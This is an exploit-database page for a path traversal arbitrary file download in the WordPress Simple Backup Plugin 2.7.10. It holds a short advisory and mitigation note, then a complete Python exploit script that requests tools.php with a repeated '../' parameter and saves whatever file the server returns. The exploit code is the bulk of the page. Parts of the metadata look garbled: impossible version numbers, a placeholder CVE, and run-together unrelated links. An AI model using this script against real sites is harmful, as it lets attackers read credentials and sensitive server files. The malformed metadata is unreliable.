header-logo
Suggest Exploit
vendor:
Simple Backup Plugin
by:
Ven3xy
6.1
CVSS
HIGH
Arbitrary File Download
22
CWE
Product Name: Simple Backup Plugin
Affected Version From: 36709
Affected Version To: 40361
Patch Exists: YES
Related CWE: CVE-2024-XXXX (Not provided in the text)
CPE: a:simple_backup_plugin:2.7.10
Metasploit:
Other Scripts: https://www.infosecmatter.com/why-your-exploit-completed-but-no-session-was-created-try-these-fixes/https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/smb/ms17_010_eternalbluehttps://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/scanner/smb/smb_enumshareshttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/drupal_restws_unserializehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/drupal_drupalgeddon2https://www.infosecmatter.com/metasploit-module-library/?mm=exploit/unix/webapp/thinkphp_rcehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/windows/local/nscp_pehttps://www.infosecmatter.com/metasploit-module-library/?mm=exploit/linux/http/fortinet_authentication_bypass_cve_2022_40684https://www.infosecmatter.com/top-25-penetration-testing-skills-and-competencies-detailed/https://www.infosecmatter.com/metasploit-module-library/?mm=auxiliary/gather/cloud_lookup
Platforms Tested: Linux
2024

Arbitrary File Download via Path Traversal in Simple Backup Plugin < 2.7.10

The Simple Backup Plugin version 2.7.10 allows an attacker to download arbitrary files from the server through a path traversal vulnerability. By manipulating the 'download_backup_file' parameter in the 'tools.php' page, an attacker can traverse directories and access sensitive files on the server.

Mitigation:

To mitigate this vulnerability, it is recommended to update Simple Backup Plugin to version 2.7.11 or later. Additionally, input validation should be implemented to prevent path traversal attacks.
Source

Exploit-DB raw data:

# Exploit Title: Simple Backup Plugin < 2.7.10 - Arbitrary File Download via Path Traversal
# Date: 2024-03-06
# Exploit Author: Ven3xy
# Software Link: https://downloads.wordpress.org/plugin/simple-backup.2.7.11.zip
# Version: 2.7.10
# Tested on: Linux

import sys
import requests
from urllib.parse import urljoin
import time

def exploit(target_url, file_name, depth):
    traversal = '../' * depth

    exploit_url = urljoin(target_url, '/wp-admin/tools.php')
    params = {
        'page': 'backup_manager',
        'download_backup_file': f'{traversal}{file_name}'
    }

    response = requests.get(exploit_url, params=params)

    if response.status_code == 200 and response.headers.get('Content-Disposition') \
            and 'attachment; filename' in response.headers['Content-Disposition'] \
            and response.headers.get('Content-Length') and int(response.headers['Content-Length']) > 0:
        print(response.text)  # Replace with the desired action for the downloaded content

        file_path = f'simplebackup_{file_name}'
        with open(file_path, 'wb') as file:
            file.write(response.content)

        print(f'File saved in: {file_path}')
    else:
        print("Nothing was downloaded. You can try to change the depth parameter or verify the correct filename.")

if __name__ == "__main__":
    if len(sys.argv) != 4:
        print("Usage: python exploit.py <target_url> <file_name> <depth>")
        sys.exit(1)

    target_url = sys.argv[1]
    file_name = sys.argv[2]
    depth = int(sys.argv[3])
    print("\n[+] Exploit Coded By - Venexy    ||    Simple Backup Plugin 2.7.10  EXPLOIT\n\n")
    time.sleep(5)


    exploit(target_url, file_name, depth)

Navigation

Suggest Exploit

Services By CQR